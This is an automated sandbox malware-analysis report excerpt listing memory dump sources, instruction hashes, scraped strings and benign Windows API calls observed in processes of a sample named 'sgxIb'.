                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7388ec9749eaf6cb4fe56c52e02ea103c9df8effd85cddc3cbaf2a2d35d3241
                                              • Instruction ID: ba966cf4871e5c99ce69245c7f8f24d944d7538b9f0eabcb8814d5823c62b6e7
                                              • Opcode Fuzzy Hash: c7388ec9749eaf6cb4fe56c52e02ea103c9df8effd85cddc3cbaf2a2d35d3241
                                              • Instruction Fuzzy Hash: 8011C2B5D01219AFCB00DF9AD884ADEFBB4FB49310F10812AE518A7241D374A954CBA5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75801e4f5fa491c01f9e533720e19370bb6b8f6cff41f1210c6e24b0639b8928
                                              • Instruction ID: 11076715cbba1c2a99af53d83b35a1f6c754edaa873f04e6d8a278368354419a
                                              • Opcode Fuzzy Hash: 75801e4f5fa491c01f9e533720e19370bb6b8f6cff41f1210c6e24b0639b8928
                                              • Instruction Fuzzy Hash: E501B1B6F181500BCB66D67C945477E67DADB85618F148869E04FCF380EA95DD028382
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3093abeec23e7c52629ad51be5fb6c15e8ac9611a6e2b8e52deb0e94700a997d
                                              • Instruction ID: d37b401a0d22fac9ab86175a07cad2d48fb0a98c5c21e687e22029ee455432d2
                                              • Opcode Fuzzy Hash: 3093abeec23e7c52629ad51be5fb6c15e8ac9611a6e2b8e52deb0e94700a997d
                                              • Instruction Fuzzy Hash: 0B01D1B5B100140BDB64996DD41472FA3EBDBCA724F10843EE10ECB354ED71DC024381
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5a0a9e1105f50f426246a5738d4e81844f3ab2f5c6763c2f5e757937f805336
                                              • Instruction ID: 2510001ec07bc14fba6633f586e147ff955eccd96aae9c939ca8182b69036813
                                              • Opcode Fuzzy Hash: b5a0a9e1105f50f426246a5738d4e81844f3ab2f5c6763c2f5e757937f805336
                                              • Instruction Fuzzy Hash: F5018175B140150BCB65997DE45473E67DEDBC9628F208479E50FCF390EE65DD024382
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f69af5f065f7dc45574bca35c05d263b904d17112e3553b6db25f50fa87bd81
                                              • Instruction ID: 429d217041260fefcb3650eaa19f8e4e75736b2ff4d2c8f401f7527e1df516c4
                                              • Opcode Fuzzy Hash: 4f69af5f065f7dc45574bca35c05d263b904d17112e3553b6db25f50fa87bd81
                                              • Instruction Fuzzy Hash: 0101A471B000154BCB65EA7DE858B2B73DAEBCA718F108478E10ECB354EE21DC028BC1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74d842d1124f311312f55bb5c2ff4d068571675dfddb4ac14adc26c5ccb1128
                                              • Instruction ID: 5f9713d5c7b9a27e6e5d44d88ef040ee74a73478e16995bb5d7829fa486212b4
                                              • Opcode Fuzzy Hash: c74d842d1124f311312f55bb5c2ff4d068571675dfddb4ac14adc26c5ccb1128
                                              • Instruction Fuzzy Hash: 22E022F0D0420C6FDF20DA74890578A3BE9D702208F1040E6D804DF206F231C9818382
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-2843079600
                                              • Opcode ID: 3cd7ad0da1c6dd7d8082a227e9a8fdd59a867a98403349458e571f60a02d4d65
                                              • Instruction ID: b71632885184fdd812314886e123071023b3ca63839f0e116cd3e78d070d08b8
                                              • Opcode Fuzzy Hash: 3cd7ad0da1c6dd7d8082a227e9a8fdd59a867a98403349458e571f60a02d4d65
                                              • Instruction Fuzzy Hash: 38123D70E002198FDB68DF69C994A9DB7F6FF88304F2089A9D409AB254EF749D41CF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 52491979305d4f98981a12dc2f3ce20006ac12eb2a2d3eba6370d9038557ad6c
                                              • Instruction ID: a11b703c2d4db3117b4773ad751fb3af30bc876d54218e84061728c6e4baa2ef
                                              • Opcode Fuzzy Hash: 52491979305d4f98981a12dc2f3ce20006ac12eb2a2d3eba6370d9038557ad6c
                                              • Instruction Fuzzy Hash: 7F9192B0A00209DFDF68DF68D994B6E77F6FF44301F148569D806AB2A4EB749C45CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-981061697
                                              • Opcode ID: 1f85bc777d361940e0e75b7550eec94cc3416bd6c88e42504468c20fd99d7c1d
                                              • Instruction ID: 7f89150c4d5aac25309604c88bb509c387c37324db4f8fce3c1ba25b5124b605
                                              • Opcode Fuzzy Hash: 1f85bc777d361940e0e75b7550eec94cc3416bd6c88e42504468c20fd99d7c1d
                                              • Instruction Fuzzy Hash: 82F16074B00209CFDB59EFA8D550AAEB7B7FF84300F248569D4169B368DBB49C42CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: df4f234eca30ef5f1634b9d0ce4267e129ca82a31179a29db47e8af4cd8f9913
                                              • Instruction ID: 238399404493c6080d0a2872b6060b1aeeef2fecb6809239438a601dbc8153db
                                              • Opcode Fuzzy Hash: df4f234eca30ef5f1634b9d0ce4267e129ca82a31179a29db47e8af4cd8f9913
                                              • Instruction Fuzzy Hash: 1B71AFF1A402098FDBA8DF68D450AAEB7F6FF85304B1184A9D40ADF254EB71DD45CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 9f712363e54a43bf3f6526dc25bf2469633889bd279350491cd8a3e874f23c58
                                              • Instruction ID: 034cd4cb39d4d1acb457979332e3aa5fcfc9a775badc8380115185dcbe776a91
                                              • Opcode Fuzzy Hash: 9f712363e54a43bf3f6526dc25bf2469633889bd279350491cd8a3e874f23c58
                                              • Instruction Fuzzy Hash: B3B15D70F002098FDB58EFA9D590A6EB7B6FF84305F248469D406AB354EB75DC82CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 103279f62f20060a6d2b0a3f4e35fc0be5df8cc2eef311d3d147e90dbf3a3c6c
                                              • Instruction ID: 628225a4b00562125127c5920da5536a2124b296ca9d9377f4991844b77ab7d4
                                              • Opcode Fuzzy Hash: 103279f62f20060a6d2b0a3f4e35fc0be5df8cc2eef311d3d147e90dbf3a3c6c
                                              • Instruction Fuzzy Hash: B451A2B4E102089FCFA5DB68D990AADB7B6FF84300F2459A9D416EB254EB31DC41CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q$LR]q$$]q$$]q
                                              • API String ID: 0-3527005858
                                              • Opcode ID: d5dcc4dc7dfa9ce224b5a7db3f9de37bb37406ea9251a265a0119fe548a3fff2
                                              • Instruction ID: 3a404b4b894b544d9391b131b6bae9fb851cc1bb75db066ee6df3177c0d38853
                                              • Opcode Fuzzy Hash: d5dcc4dc7dfa9ce224b5a7db3f9de37bb37406ea9251a265a0119fe548a3fff2
                                              • Instruction Fuzzy Hash: 9F51D170B002059FDB58EF28D990A6E77E6FF84704F1495A9D4069F3A9EB74EC01CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 60d49ca3f8539189fae91b85778311dd5204b90d5f8104f6d537acd2301eb5ef
                                              • Instruction ID: 9548be705fbdf846622189ee3e0e3d76b2b38b5a724c898bfa71917f46623129
                                              • Opcode Fuzzy Hash: 60d49ca3f8539189fae91b85778311dd5204b90d5f8104f6d537acd2301eb5ef
                                              • Instruction Fuzzy Hash: 98415FB4A102058FCFA5DB64D59096DB3B6FF84300B2495A9D415EB254EB30EC41CB91

                                              Execution Graph

                                              Execution Coverage:9.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:159
                                              Total number of Limit Nodes:6

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0302B176
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 030259C9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 030259C9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0

                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 056D41E1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2267447094.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_56d0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0302D4E6,?,?,?,?,?), ref: 0302D5A7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0302D4E6,?,?,?,?,?), ref: 0302D5A7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0302B176
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0

                                              Execution Graph

                                              Execution Coverage:13.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:20
                                              Total number of Limit Nodes:5

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: 75c1fbac4f4055dfe40295882213cf7e89c4bd09ec948b66617754cf7db21007
                                              • Instruction ID: 2b2da2eabd9b0f2d15dae1f3cfc3cfe798cda55421bf6df6feab3cc52dd0eff7
                                              • Opcode Fuzzy Hash: 75c1fbac4f4055dfe40295882213cf7e89c4bd09ec948b66617754cf7db21007
                                              • Instruction Fuzzy Hash: 59027C30B002169FDB54DF69D990AAEB7B6FF84314F148529D406EB399DB39EC42CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852
                                              • Opcode ID: b7be07db9fc3f4d9a2fb1c55df0b2097e00472b6d22e9a4da36f13fe986b5ac2
                                              • Instruction ID: 8b1b7dcce9d837c2fa0f27ccd1f2c94f4c6c5c54485a9dd257ea4c21b7ac9b30
                                              • Opcode Fuzzy Hash: b7be07db9fc3f4d9a2fb1c55df0b2097e00472b6d22e9a4da36f13fe986b5ac2
                                              • Instruction Fuzzy Hash: 7122A275F00215CFDF64DFA8E4806EEBBB2EB84314F208569D54AAB358DA35DC42CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bf3108f10e9b2a518478fe5a86796050b1820af59cc57d7e5ae1656b77781af
                                              • Instruction ID: 7804c73d834224600d0e9cc67592e8823a8d55ce4980aeb32816150ca94a06c1
                                              • Opcode Fuzzy Hash: 7bf3108f10e9b2a518478fe5a86796050b1820af59cc57d7e5ae1656b77781af
                                              • Instruction Fuzzy Hash: F5629B34B00205CFDB54DB68D594AADB7F2EF88314F249569E406EB398DB39EC46CB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 4d43e8d65736ede97ef34cf73f8c311e233264e20945f5af14dff7552af68702
                                              • Instruction ID: 5e798bbebb7284d34191cea361dfa3babff912d9057154f5f324c81c8c9d3e5a
                                              • Opcode Fuzzy Hash: 4d43e8d65736ede97ef34cf73f8c311e233264e20945f5af14dff7552af68702
                                              • Instruction Fuzzy Hash: BEE14A30E10209CFDB69DF69D5806AEB7B6EF89304F14952AE406AB358DB34DC46CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 08a67ba72c7f47c2887ea286151a314a7e48c04b0b6e3d4f0644eb7733baea33
                                              • Instruction ID: 7529c67c4964d54fc14326fc7afc0b5c5eb66d9aff8882f9393057a92a0864ab
                                              • Opcode Fuzzy Hash: 08a67ba72c7f47c2887ea286151a314a7e48c04b0b6e3d4f0644eb7733baea33
                                              • Instruction Fuzzy Hash: 01915030F0061A9FDB54DF69D9A07AE73F6FF85204F108569D50AEB388EA349C46CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q
                                              • API String ID: 0-182748909
                                              • Opcode ID: 689ebf02370d0ce47ffe8f492c3de1aa88f0fe6b14551a0db7c7b0f2c18ffad1
                                              • Instruction ID: 0313f41ebdda6c83d8e8b8fb68846b38e574ef4158e0135d3d697ba2aaff20a1
                                              • Opcode Fuzzy Hash: 689ebf02370d0ce47ffe8f492c3de1aa88f0fe6b14551a0db7c7b0f2c18ffad1
                                              • Instruction Fuzzy Hash: 63622F746006068FCB55EF68D680A9EB7F6FF84304B208A79D0069F359DB79ED46CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (aq$(aq$(aq
                                              • API String ID: 0-2593664646
                                              • Opcode ID: f5d9d1ce10c79236d7ed5a08a41c9d133e10e95a80eae8a8f39f0997761a0d80
                                              • Instruction ID: 9e73e50ca59f22e1a8bf16cf460304d1c2c40b49f2fd636f944f4259e902dbc2
                                              • Opcode Fuzzy Hash: f5d9d1ce10c79236d7ed5a08a41c9d133e10e95a80eae8a8f39f0997761a0d80
                                              • Instruction Fuzzy Hash: 0CD17AB0E0021A9FCF14DFA9C8546EEBFF2BF89310F14856AD405AB391DB74A941CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq$\Obq
                                              • API String ID: 0-4057264190
                                              • Opcode ID: d41a5abe63b63fffe522f26bb7e0c596fb2f555bdf49d4b5f30ade2835423c91
                                              • Instruction ID: e18135eed4a39f04c61e8683eb81ccbda789e00609326db699ba188d879df3fa
                                              • Opcode Fuzzy Hash: d41a5abe63b63fffe522f26bb7e0c596fb2f555bdf49d4b5f30ade2835423c91
                                              • Instruction Fuzzy Hash: 6561A030F00219DFEB54DFA9C8547AEBBF6FB88704F208429E106AB395DB759C018B91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: d05b506c47107a1655a2d87c4ce6922e547fc00e42e81454a5eb7df87076e1a6
                                              • Instruction ID: 55d7cd3b0bf44a3ea26fdf2bcfd36e1645edfdc27939a2a2c3c85055f441ef98
                                              • Opcode Fuzzy Hash: d05b506c47107a1655a2d87c4ce6922e547fc00e42e81454a5eb7df87076e1a6
                                              • Instruction Fuzzy Hash: D0514131F006059FDB54DB68D9A0BAE77F6FB89204F108529D51AEB398DA34DC06CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq
                                              • API String ID: 0-2292610095
                                              • Opcode ID: 31cf2cf762915c71265535374229ea74e6b90b4cbf6fffb0aba95144800d1fd7
                                              • Instruction ID: 1ff7be1c4ebc6f8b628b5dee40b8e708a7b1aeae041db0cf1dd16d31dc068fd0
                                              • Opcode Fuzzy Hash: 31cf2cf762915c71265535374229ea74e6b90b4cbf6fffb0aba95144800d1fd7
                                              • Instruction Fuzzy Hash: 05519130F002199FEB54DFA9C8557AEBBF6FF88704F208529D106AB395DA759C01CB91

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4491320890.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_13c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:

                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 013CEEBF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4491320890.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_13c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0

                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 013CEEBF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4491320890.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_13c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q
                                              • API String ID: 0-1007455737
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Obq
                                              • API String ID: 0-2878401908
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01dd6cb3cef7cc6d9a7ce342274bd665a9225bc23b7239cb27ffbcd30a26cccd
                                              • Instruction ID: 8fb53d94e5ddd0be69317e04c150c25dd1b27849e8d45f1cae3e5f7cbd0623a0
                                              • Opcode Fuzzy Hash: 01dd6cb3cef7cc6d9a7ce342274bd665a9225bc23b7239cb27ffbcd30a26cccd
                                              • Instruction Fuzzy Hash: 6E3164B0A016079FCB14DF6AC584AABBBF6FF88710B14C56DD4199B714E734E842CB90
                                              Memory Dump Source
